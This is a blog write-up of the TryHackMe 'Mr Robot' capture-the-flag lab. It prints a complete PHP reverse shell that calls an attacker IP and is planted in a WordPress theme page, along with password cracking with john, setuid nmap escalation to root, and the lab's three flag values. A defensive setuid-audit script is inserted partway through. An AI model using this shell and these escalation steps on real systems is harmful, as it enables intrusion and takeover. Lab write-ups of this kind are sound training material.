THM-Mr Robot CTF

This article was last updated on 22 January 2025, early morning

Mr Robot CTF

Ran an nmap scan but found nothing useful; went straight to the website on port 80 and found nothing there either, and the simple interactive features on it are of no use.

Scan it with dirsearch:

[21:23:55] 200 -    1KB - /admin/
[21:23:55] 403 - 224B - /admin/.htaccess
[21:24:01] 200 - 1KB - /admin/index
[21:24:01] 301 - 0B - /admin/index.php -> http://10.10.94.107/admin/
[21:24:02] 200 - 1KB - /admin/index.html
[21:29:03] 200 - 0B - /favicon.ico
[21:29:05] 301 - 0B - /feed -> http://10.10.94.107/feed/
[21:29:34] 301 - 0B - /html/js/misc/swfupload//swfupload.swf -> http://10.10.94.107/html/js/misc/swfupload/swfupload.swf
[21:29:39] 301 - 0B - /image -> http://10.10.94.107/image/
[21:29:40] 403 - 216B - /images/
[21:29:44] 301 - 235B - /images -> http://10.10.94.107/images/
[21:29:50] 301 - 0B - /index.php -> http://10.10.94.107/
[21:29:50] 200 - 1KB - /index.html
[21:33:12] 200 - 64B - /readme
[21:33:12] 200 - 64B - /readme.html
[21:33:27] 200 - 41B - /robots.txt
[21:33:27] 301 - 0B - /roundcube/index.php -> http://10.10.94.107/roundcube/
[21:33:28] 301 - 0B - /rss -> http://10.10.94.107/feed/
[21:34:11] 301 - 0B - /siteadmin/index.php -> http://10.10.94.107/siteadmin/
[21:34:13] 200 - 0B - /sitemap
[21:34:13] 200 - 0B - /sitemap.xml
[21:34:13] 200 - 0B - /sitemap.xml.gz
[21:36:26] 200 - 1B - /wp-admin/admin-ajax.php
[21:36:26] 302 - 0B - /wp-admin/ -> http://10.10.94.107/wp-login.php?redirect_to=http%3A%2F%2F10.10.94.107%2Fwp-admin%2F&reauth=1
[21:36:26] 500 - 3KB - /wp-admin/setup-config.php
[21:36:26] 200 - 0B - /wp-config.php
[21:36:31] 301 - 239B - /wp-content -> http://10.10.94.107/wp-content/
[21:36:32] 403 - 247B - /wp-content/plugins/akismet/akismet.php
[21:36:32] 200 - 0B - /wp-content/
[21:36:32] 301 - 0B - /wp-content/plugins/adminer/inc/editor/index.php -> http://10.10.94.107/wp-content/plugins/adminer/inc/editor/
[21:36:33] 301 - 279B - /wp-content/plugins/all-in-one-wp-migration/storage -> http://10.10.94.107/wp-content/plugins/all-in-one-wp-migration/storage/
[21:36:33] 200 - 0B - /wp-content/plugins/google-sitemap-generator/sitemap-core.php
[21:36:33] 500 - 0B - /wp-content/plugins/hello.php
[21:36:33] 403 - 228B - /wp-content/uploads/
[21:36:33] 200 - 0B - /wp-content/themes/
[21:36:35] 200 - 0B - /wp-cron.php
[21:36:35] 403 - 221B - /wp-includes/
[21:36:35] 301 - 240B - /wp-includes -> http://10.10.94.107/wp-includes/
[21:36:35] 500 - 0B - /wp-includes/rss-functions.php
[21:36:35] 200 - 3KB - /wp-login/
[21:36:36] 200 - 3KB - /wp-login.php
[21:36:36] 301 - 0B - /wp-register.php -> http://10.10.94.107/wp-login.php?action=register
[21:36:36] 302 - 0B - /wp-signup.php -> http://10.10.94.107/wp-login.php?action=register
[21:36:39] 403 - 228B - /wp-content/upgrade/
[21:36:41] 301 - 0B - /www/phpMyAdmin/index.php -> http://10.10.94.107/www/phpMyAdmin/
[21:36:35] 200 - 3KB - /wp-login

Analysing the results shows the CMS is WordPress. Take a look at robots.txt:

http://10.10.94.107/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt

What is key 1?

Just read the file directly:

073403c8a58a1f80d943455fb30724b9

What is key 2?

Go to the licence page and look at it; it does contain something. View the page source (the scan found this page too, but I did not paste that above); you need F12 to see it, and it is hidden very far down.

what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?
do you want a password or something?
ZWxsaW90OkVSMjgtMDY1Mgo=

Base64-decoding this gives elliot:ER28-0652.

These credentials can be used to log in at wp-login; once inside, go to the theme editor and modify the 404 page.

After getting into WP, write a webshell into it (insert it into the file rather than deleting everything):

<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.8.11.245';
$port = 5566;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0); // Parent exits
    }
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

chdir("/");

umask(0);

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

$descriptorspec = array(
    0 => array("pipe", "r"), // stdin is a pipe that the child will read from
    1 => array("pipe", "w"), // stdout is a pipe that the child will write to
    2 => array("pipe", "w")  // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}

?>

Listen on that port locally, then request /404 in the browser:

$ cd /home
$ ls
robot
$ cd robot
$ ls
key-2-of-3.txt
password.raw-md5

No permission:

$ whoami
daemon
$ sudo -l
sudo: no tty present and no askpass program specified
$ ls -al
total 16
drwxr-xr-x 2 root root 4096 Nov 13 2015 .
drwxr-xr-x 3 root root 4096 Nov 13 2015 ..
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
┌──(root㉿Coyano)-[~]
└─# echo 'c3fcd3d76192e4007dfb496cca67e13b' > hash.txt

┌──(root㉿Coyano)-[~]
└─# john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 512/512 AVX512BW 16x3])
Warning: no OpenMP support for this hash type, consider --fork=32
Press 'q' or Ctrl-C to abort, almost any other key for status
abcdefghijklmnopqrstuvwxyz (?)
1g 0:00:00:00 DONE (2025-01-21 22:32) 100.0g/s 4070Kp/s 4070Kc/s 4070KC/s power12..telcel
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

So we get:

username: robot
password: abcdefghijklmnopqrstuvwxyz

The command find / -perm -4000 2>/dev/null finds every executable with the setuid bit set on Linux and other Unix-like systems. The setuid bit lets a user run the file with the privileges of the file's owner rather than with the caller's own privileges.

$ find / -perm -4000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
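As an added defender-side check that is not part of the writeup, the POSIX shell function below audits a setuid listing like the one above against an allowlist of distro-shipped binaries and tags anything living outside package-managed prefixes, which is exactly how /usr/local/bin/nmap stands out on this box. The allowlist and the sample listing are constructed for the example and should be tailored per distribution.

```shell
#!/bin/sh
# Added example, not code from the writeup. Flags setuid binaries that are not
# in a known-good allowlist; entries under locally managed prefixes are tagged
# HIGH because the package manager never installs setuid files there.

# Constructed allowlist (assumption): setuid binaries shipped by the base system.
SUID_ALLOWLIST='/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown'

# suid_audit: reads setuid paths from stdin, one per line (for example the
# output of find / -perm -4000 2>/dev/null), prints only those not allowlisted.
suid_audit() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        # Exact whole-line, fixed-string match against the allowlist.
        if printf '%s\n' "$SUID_ALLOWLIST" | grep -qxF -- "$path"; then
            continue
        fi
        case "$path" in
            /usr/local/*|/opt/*|/home/*|/tmp/*|/var/tmp/*) echo "HIGH   $path" ;;
            *)                                             echo "REVIEW $path" ;;
        esac
    done
}

# Constructed sample input: a subset of the listing from the writeup.
SAMPLE='/bin/ping
/bin/su
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/pt_chown'

# On a live host: find / -perm -4000 2>/dev/null | suid_audit
printf '%s\n' "$SAMPLE" | suid_audit
```

Anything tagged HIGH deserves the question the writeup answers next for nmap: does the binary offer a shell escape or command execution that the setuid bit turns into root?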
$ su
su: must be run from a terminal
python -c 'import pty; pty.spawn("/bin/bash")' is a commonly used Python one-liner for starting an interactive shell from a restricted environment; it is typically used with a reverse shell or to break out of a limited environment (for example after logging into the target over SSH).
daemon@linux:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

What is key 3?

robot@linux:/$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

Let's see what nmap can do:

robot@linux:/usr/local/bin$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !ls
ls
Unknown command (!ls) -- press h <enter> for help
nmap> !ls
!ls
nmap
waiting to reap child : No child processes
nmap> !root
!root
sh: 1: root: not found
waiting to reap child : No child processes
nmap> !ls /root
!ls /root
firstboot_done key-3-of-3.txt
waiting to reap child : No child processes
nmap> !cat /root/key-3-of-3.txt
!cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
waiting to reap child : No child processes

Older versions of nmap have an --interactive mode that allows commands to be run interactively; a similar approach works with vim.


THM-Mr Robot CTF
https://0ran9ewww.github.io/2025/01/21/渗透/Mr Robot CTF/
Author: orange
Published: 21 January 2025
Updated: 22 January 2025